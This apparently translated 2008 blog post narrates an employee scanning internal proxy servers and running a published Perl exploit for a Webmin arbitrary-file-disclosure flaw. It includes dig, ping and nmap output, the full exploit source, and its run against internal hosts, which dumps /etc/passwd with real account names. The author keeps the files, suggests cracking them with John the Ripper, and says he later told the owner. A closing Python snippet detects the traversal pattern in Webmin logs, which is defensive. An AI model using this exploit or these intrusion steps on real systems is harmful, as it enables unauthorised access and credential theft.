By thesims
Published: January 13, 2008
Hmm, morning as usual… off to the office on the motorbike, the bike that stands for 3 years of struggle before I could get a job at a company, even if only as an outsourced worker. That's my routine, huh; even on a day off I come in, as it happens I'm on the morning shift… Got to the office and for fun started poking at the server I built myself. Turns out it's pretty useful: storing files, remoting into the network, even mp3 streaming, huh, better than leaving that server idle. I switched on my own box and tried to get online, and ahhh, turns out the gateway was down. Annoying… right when I needed to browse, and what's more every connection was dropping… For fun I ran a traceroute, and it turned out the problem wasn't at the gateway server's hop but in the routing outward, i.e. on the public IP side. I remember well, this runs on a Cisco router… ahh, I'll leave that layer 3 problem alone for now and go to layer 7 first… Out of ideas, I thought and thought; something seemed off, ohh yeahhh!!! Like a neon light going on in my head: a friend once told me, "just use proxy.sibiru.co.id, Bal". Hmm, just for fun I wanted to know where this proxy resolves to… Here's the result:

```
[iqbal@boc ~]$ dig proxies.sibiru.co.id

; <<>> DiG 9.3.3rc2 <<>> proxies.sibiru.co.id
;; global options:  printcmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 6317
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 3, AUTHORITY: 4, ADDITIONAL: 3

;; QUESTION SECTION:
;proxies.sibiru.co.id.          IN      A

;; ANSWER SECTION:
proxies.sibiru.co.id.   384     IN      A       10.1.10.19
proxies.sibiru.co.id.   384     IN      A       10.1.10.17
proxies.sibiru.co.id.   384     IN      A       10.1.10.18

;; AUTHORITY SECTION:
sibiru.co.id.           384     IN      NS      ns.sibiru.co.id.
sibiru.co.id.           384     IN      NS      ns0.sibiru.co.id.
sibiru.co.id.           384     IN      NS      ldap.sibiru.co.id.
sibiru.co.id.           384     IN      NS      pusren01.risti.sibiru.co.id.

;; ADDITIONAL SECTION:
ns.sibiru.co.id.        384     IN      A       10.2.1.5
ns0.sibiru.co.id.       384     IN      A       10.2.12.12
ldap.sibiru.co.id.      384     IN      A       10.1.2.38

;; Query time: 3 msec
;; SERVER: 10.11.15.220#53(10.11.15.220)
;; WHEN: Sun Jan 13 20:57:32 2008
;; MSG SIZE  rcvd: 217
```

Now look at the part in bold, the ANSWER SECTION… there are 3 servers; let me ping them first to see which ones reply:

```
[iqbal@boc ~]$ ping 10.1.10.19
PING 10.1.10.19 (10.1.10.19) 56(84) bytes of data.
64 bytes from 10.1.10.19: icmp_seq=1 ttl=60 time=26.1 ms
64 bytes from 10.1.10.19: icmp_seq=2 ttl=60 time=25.4 ms
64 bytes from 10.1.10.19: icmp_seq=3 ttl=60 time=25.9 ms
64 bytes from 10.1.10.19: icmp_seq=4 ttl=60 time=25.7 ms
64 bytes from 10.1.10.19: icmp_seq=5 ttl=60 time=25.3 ms
64 bytes from 10.1.10.19: icmp_seq=6 ttl=60 time=25.5 ms

--- 10.1.10.19 ping statistics ---
6 packets transmitted, 6 received, 0% packet loss, time 5000ms
rtt min/avg/max/mdev = 25.383/25.711/26.199/0.291 ms

[iqbal@boc ~]$ ping 10.1.10.17
PING 10.1.10.17 (10.1.10.17) 56(84) bytes of data.
64 bytes from 10.1.10.17: icmp_seq=1 ttl=60 time=25.4 ms
64 bytes from 10.1.10.17: icmp_seq=2 ttl=60 time=26.6 ms
64 bytes from 10.1.10.17: icmp_seq=3 ttl=60 time=25.4 ms
64 bytes from 10.1.10.17: icmp_seq=4 ttl=60 time=25.5 ms
64 bytes from 10.1.10.17: icmp_seq=5 ttl=60 time=25.1 ms

--- 10.1.10.17 ping statistics ---
5 packets transmitted, 5 received, 0% packet loss, time 3998ms
rtt min/avg/max/mdev = 25.160/25.677/26.693/0.565 ms

[iqbal@boc ~]$ ping 10.1.10.18
PING 10.1.10.18 (10.1.10.18) 56(84) bytes of data.
64 bytes from 10.1.10.18: icmp_seq=1 ttl=60 time=25.6 ms
64 bytes from 10.1.10.18: icmp_seq=2 ttl=60 time=25.7 ms
64 bytes from 10.1.10.18: icmp_seq=3 ttl=60 time=25.2 ms
64 bytes from 10.1.10.18: icmp_seq=4 ttl=60 time=25.7 ms
64 bytes from 10.1.10.18: icmp_seq=5 ttl=60 time=25.4 ms
64 bytes from 10.1.10.18: icmp_seq=6 ttl=60 time=25.4 ms

--- 10.1.10.18 ping statistics ---
6 packets transmitted, 6 received, 0% packet loss, time 5000ms
rtt min/avg/max/mdev = 25.298/25.565/25.760/0.218 ms
```

Wow, cool… they all reply, so those are the proxies and I just need to find the proxy port. Here's the port scan I ran:

```
[iqbal@boc ~]$ nmap 10.1.10.17-19

Starting Nmap 4.11 ( http://www.insecure.org/nmap/ ) at 2008-01-13 21:06 WIT
Interesting ports on 10.1.10.17:
Not shown: 1673 closed ports
PORT      STATE    SERVICE
21/tcp    open     ftp
22/tcp    open     ssh
80/tcp    open     http
6000/tcp  filtered X11
8080/tcp  open     http-proxy
8443/tcp  open     https-alt
10000/tcp open     snet-sensor-mgmt

Interesting ports on 10.1.10.18:
Not shown: 1672 closed ports
PORT      STATE SERVICE
22/tcp    open  ssh
111/tcp   open  rpcbind
654/tcp   open  unknown
669/tcp   open  unknown
744/tcp   open  flexlm
6000/tcp  open  X11
8080/tcp  open  http-proxy
10000/tcp open  snet-sensor-mgmt

Interesting ports on 10.1.10.19:
Not shown: 1671 closed ports
PORT      STATE SERVICE
22/tcp    open  ssh
53/tcp    open  domain
111/tcp   open  rpcbind
698/tcp   open  unknown
713/tcp   open  unknown
841/tcp   open  unknown
6000/tcp  open  X11
8080/tcp  open  http-proxy
10000/tcp open  snet-sensor-mgmt

Nmap finished: 3 IP addresses (3 hosts up) scanned in 29.547 seconds
```
Now my head was full of even more question marks: port 10000, that's Webmin, isn't it? All I was looking for was a proxy… but as it happened I also wanted to know whether that server had any holes. After some digging I found one at http://www.milw0rm.com/exploits/2017, copy-pasted it into a file called webmin.pl, and here's the webmin exploit:

```perl
[iqbal@boc expl]$ cat webmin.pl
#!/usr/bin/perl
# Exploit for WEBMIN and USERMIN less than 1.29x
# ARBITARY REMOTE FILE DISCLOSURE
# WORKS FOR HTTP AND HTTPS (NOW)
# Thrusday 13th July 2006
# Vulnerability Disclosure at securitydot.net
# Coded by UmZ! umz32.dll@gmail.com
#
# Make sure you have LWP before using this exploit.
# USE IT AT YOUR OWN RISK
#
# GREETS to wiseguy, Anonymous Individual, Uquali......Jhant... Fakhru... etc........................
# for other.. like AHMED n FAIZ ... (GET A LIFE MAN).
# Revised on Friday 14th July 2006
use LWP::Simple;
use LWP::UserAgent;

my $userag = LWP::UserAgent->new;

if (@ARGV < 4) {
    print("Usage: $0 <target> <port> <filename> <target type>\n");
    print("TARGETS are\n");
    print("0 - > HTTP\n");
    print(" 1 - > HTTPS\n");
    print("Define full path with file name\n");
    print("Example: ./webmin.pl blah.com 10000 /etc/passwd 0\n");
    exit(1);
}
($target, $port, $filename, $tar) = @ARGV;

print("WEBMIN EXPLOIT !!!!! coded by UmZ!\n");
print("Comments and Suggestions are welcome at umz32.dll [at] gmail.com\n");
print("Vulnerability disclose at securitydot.net I am just coding it in perl 'cuz I hate PHP!\n");
print("Attacking $target on port $port!\n");
print("FILENAME: $filename\n");

# 40 "/..%01" segments are prepended to the requested path under /unauthenticated/
$temp = "/..%01" x 40;

if ($tar == '0') {
    # plain HTTP: LWP::Simple's get() returns the body or undef
    my $url = "http://" . $target . ":" . $port . "/unauthenticated/" . $temp . $filename;
    $content = get $url;
    print("\n FILE CONTENT STARTED");
    print("\n ----------------------------------- \n");
    print("$content");
    print("\n ------------------------------------- \n");
}
elsif ($tar == '1') {
    # HTTPS: go through the UserAgent so the status line is available on failure
    my $url = "https://" . $target . ":" . $port . "/unauthenticated/" . $temp . $filename;
    my $req = HTTP::Request->new(GET => $url);
    my $res = $userag->request($req);
    if ($res->is_success) {
        print("FILE CONTENT STARTED \n");
        print("------------------------------------------- \n");
        print $res->as_string;
        print("------------------------------------------- \n");
    } else {
        print "Failed: ", $res->status_line, "\n";
    }
}
# milw0rm.com [2006-07-15]
```

```
[iqbal@boc expl]$ perl webmin.pl 10.1.10.18 10000 /etc/shadow 1
WEBMIN EXPLOIT !!!!! coded by UmZ!
Comments and Suggestions are welcome at umz32.dll [at] gmail.com
Vulnerability disclose at securitydot.net I am just coding it in perl 'cuz I hate PHP!
Attacking 10.1.10.18 on port 10000!
FILENAME: /etc/shadow
Failed: 404 File not found
```

Failed.

```
[iqbal@boc expl]$ perl webmin.pl 10.1.10.19 10000 /etc/shadow 1
WEBMIN EXPLOIT !!!!! coded by UmZ!
Comments and Suggestions are welcome at umz32.dll [at] gmail.com
Vulnerability disclose at securitydot.net I am just coding it in perl 'cuz I hate PHP!
Attacking 10.1.10.19 on port 10000!
FILENAME: /etc/shadow
Failed: 404 File not found
```

The one above failed too.

```
[iqbal@boc expl]$ perl webmin.pl 10.1.10.17 10000 /etc/passwd 1
WEBMIN EXPLOIT !!!!! coded by UmZ!
Comments and Suggestions are welcome at umz32.dll [at] gmail.com
Vulnerability disclose at securitydot.net I am just coding it in perl 'cuz I hate PHP!
Attacking 10.1.10.17 on port 10000!
FILENAME: /etc/passwd
FILE CONTENT STARTED
-------------------------------------------
HTTP/1.0 200 Document follows
Connection: close
Date: Fri, 11 Jan 2008 06:42:31 GMT
Server: MiniServ/0.01
Content-Length: 1190
Content-Type: text/plain
Last-Modified: Tue, 20 Jun 2006 08:38:14 GMT
Client-Date: Fri, 11 Jan 2008 03:13:02 GMT
Client-Peer: 10.1.10.17:10000
Client-Response-Num: 1
Client-SSL-Cert-Issuer: /O=Webmin Webserver on localhost/CN=*/emailAddress=root@localhost
Client-SSL-Cert-Subject: /O=Webmin Webserver on localhost/CN=*/emailAddress=root@localhost
Client-SSL-Cipher: AES256-SHA
Client-SSL-Warning: Peer certificate not verified

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/bin/sh
daemon:x:2:2:daemon:/sbin:/bin/sh
adm:x:3:4:adm:/var/adm:/bin/sh
lp:x:4:7:lp:/var/spool/lpd:/bin/sh
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/bin/sh
news:x:9:13:news:/var/spool/news:/bin/sh
uucp:x:10:14:uucp:/var/spool/uucp:/bin/sh
nobody:x:65534:65534:Nobody:/:/bin/sh
rpm:x:13:101:system user for rpm:/var/lib/rpm:/bin/false
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
rpc:x:70:70:system user for portmap:/:/bin/false
xfs:x:71:71:system user for XFree86:/etc/X11/fs:/bin/false
postfix:x:72:72:system user for postfix:/var/spool/postfix:/bin/false
rpcuser:x:73:73:system user for nfs-utils:/var/lib/nfs:/bin/false
squid:x:74:74:system user for squid:/var/spool/squid:/bin/false
sshd:x:75:75:system user for openssh:/var/empty:/bin/true
admin:x:501:501:admin:/home/admin:/bin/bash
apache:x:76:76:system user for apache2:/var/www:/bin/sh
mysql:x:77:77:system user for MySQL:/var/lib/mysql:/bin/bash
iscan:x:503:503::/:/bin/false
bowo:x:505:505::/home/bowo:/bin/bash
bayu:x:506:506:Ariya Bayu:/home/bayu:/bin/bash
```

Whoa, it got in……… I got you…………

```
[iqbal@boc expl]$ perl webmin.pl 10.1.10.17 10000 /etc/shadow 1
WEBMIN EXPLOIT !!!!! coded by UmZ!
Comments and Suggestions are welcome at umz32.dll [at] gmail.com
Vulnerability disclose at securitydot.net I am just coding it in perl 'cuz I hate PHP!
Attacking 10.1.10.17 on port 10000!
FILENAME: /etc/shadow
FILE CONTENT STARTED
-------------------------------------------
HTTP/1.0 200 Document follows
Connection: close
Date: Fri, 11 Jan 2008 06:43:22 GMT
Server: MiniServ/0.01
Content-Length: 800
Content-Type: text/plain
Last-Modified: Sun, 25 Jun 2006 15:03:50 GMT
Client-Date: Fri, 11 Jan 2008 03:13:51 GMT
Client-Peer: 10.1.10.17:10000
Client-Response-Num: 1
Client-SSL-Cert-Issuer: /O=Webmin Webserver on localhost/CN=*/emailAddress=root@localhost
Client-SSL-Cert-Subject: /O=Webmin Webserver on localhost/CN=*/emailAddress=root@localhost
Client-SSL-Cipher: AES256-SHA
Client-SSL-Warning: Peer certificate not verified
```
So 10.1.10.17 has a hole in Webmin… you can peek at /etc/passwd and /etc/shadow… hmm, I started out looking for a proxy and ended up finding this. Ahh whatever, I just copy-pasted that /etc/passwd and /etc/shadow… might be useful someday… and it was pretty nice to get a peek… The next day I reported the problem to the owner, and they actually replied…. even though it could be worked over with john the ripper or by looking for slocate.db (to find *.conf files with plain-text passwords) hihihi.

Thanks to: Allah SWT…, Cyberlog: sorry I could only send an article now, even if it's just this one; I pray your wife stays healthy…, AdhietSlank: how's your girl, so you're getting married, hurry up and get married, k1nk0n9: still busy with the new job, where's the celebration dinner?…, Fl3xu5: still busy with college, keep studying boss, don't lose heart, Sukam: where are you cok, when do we meet again lay…, Ariee & Rini: thanks for the support and encouragement, may your kid grow up to be a useful person, sorry I haven't had a chance to meet the little one yet, and Ariee, BTS or your body, your body's getting heavier heheheh…, A-technique: sorry SOB I haven't made it back to Depok yet… let's just do it over YM hehehe, Jantap: hehehe, field manager: this guy knows a lot about BTS calculations, keep succeeding…, Letjen: law school with computers as just a hobby, those go together too, so you'll be my lawyer… for free, yeah… success to everyone, ibnu: send me the pyramid, and the sphinx too, yaaaaa……, z3r0byt3: how are you sir, still teaching in Bekasi? when can I come over to your place for some enlightenment, office mates at BOC: let's handle it okay, regards TheSimS aka Iqbal@sekuritionline.net

Nb: Apologies if anyone is harmed by this; the intent is learning, not to take advantage of a system weakness, and it isn't meant to bring anyone down. And admins, be diligent about patching your systems, that Webmin has a hole.
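For the admins the note above is aimed at, here is an added defender-side example, not from the post or from Webmin: the exploit shown earlier builds its request from /unauthenticated/ plus repeated /..%01 segments, so that is the pattern to hunt for in miniserv.log. The log lines are constructed, the Common Log Format layout is an assumption, and resolve_target assumes the vulnerable server dropped the control bytes before collapsing the path.

```python
import posixpath
import re
from urllib.parse import unquote

# Constructed sample log lines, not from the post. Assumption: miniserv.log
# uses Common Log Format (client, ident, user, [timestamp], "request", status, size).
SAMPLE_LOG = """\
10.11.15.220 - - [13/Jan/2008:21:10:02 +0700] "GET /unauthenticated/..%01/..%01/..%01/etc/passwd HTTP/1.0" 200 1190
10.11.15.220 - - [13/Jan/2008:21:10:40 +0700] "GET /unauthenticated/..%01/..%01/etc/shadow HTTP/1.0" 200 800
10.1.2.38 - - [13/Jan/2008:21:11:05 +0700] "GET /unauthenticated/style.css HTTP/1.0" 200 512
10.1.2.38 - admin [13/Jan/2008:21:12:00 +0700] "GET /proc/index.cgi HTTP/1.0" 200 4021
10.11.15.220 - - [13/Jan/2008:21:13:17 +0700] "GET /unauthenticated/../../etc/passwd HTTP/1.0" 404 0
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) (?P<size>\S+)')

# ".." immediately followed by a C0 control byte, which is what "..%01" decodes to.
CTRL_DOTDOT = re.compile(r'\.\.[\x00-\x1f]')

def resolve_target(raw_path):
    """URL-decode, drop control bytes, then collapse '..' segments (assumed server
    order), giving the file a successful request would have handed back."""
    cleaned = re.sub(r'[\x00-\x1f]', '', unquote(raw_path))
    return posixpath.normpath(cleaned)

def classify_request(raw_path, status):
    """Return (verdict, resolved_target) for one request path."""
    decoded = unquote(raw_path)
    target = resolve_target(raw_path)
    if CTRL_DOTDOT.search(decoded):
        return ('exploit-success' if status == 200 else 'exploit-attempt'), target
    if decoded.startswith('/unauthenticated/') and not target.startswith('/unauthenticated/'):
        return 'plain-traversal', target  # stopped by the '..' check, still worth an alert
    return 'ok', target

def scan_log(text):
    """Return (client_ip, verdict, resolved_target) for every flagged request."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        verdict, target = classify_request(m['path'], int(m['status']))
        if verdict != 'ok':
            hits.append((m['ip'], verdict, target))
    return hits
```

An 'exploit-success' hit against a Webmin older than 1.29x means the named file should be treated as disclosed, which for /etc/shadow means rotating every password in it.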